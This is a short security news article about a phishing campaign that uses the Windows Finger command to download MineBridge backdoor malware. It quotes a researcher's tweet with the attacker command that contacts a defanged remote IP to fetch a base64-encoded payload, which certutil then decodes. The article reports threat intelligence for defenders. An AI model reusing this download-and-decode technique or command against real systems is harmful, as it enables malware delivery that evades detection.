A new phishing campaign was spotted in the wild abusing a legitimate Windows feature to download backdoor malware. Threat actors here are using spreading emails with malicious executables, that if downloaded and enabled, will use the Windows Finger command to retrieve MineBridge malware.

Windows Feature Abused For Setting Backdoor

It’s common that hackers abuse legitimate system functions to avoid detection. Threat actors of MineBridge malware too are doing the same, in a recently spotted phishing campaign. Kirk Sayre, a security researcher has discovered this campaign, where the bad guys are exploiting the Windows Finger feature.

The Finger feature is a remote tool to get information on the list of users on a remote system or in-depth details of a specific user using a remote system. This was first available for Linux/Unix OS, and later on Windows. As described by Kirk Sayre , hackers are using this command to Install MineBridge backdoors in the host’s system.

https://t.co/U0GtPdILCk ITW maldoc using finger.exe to download 2nd stage. Runs ‘finger nc20@184[.]164[.]146[.]102’ to pull down b64 encoded cert, certutil to decode, runs payload. Payload is https://t.co/LeJ8mIYyIh . — Kirk Sayre (@bigmacjpg) January 14, 2021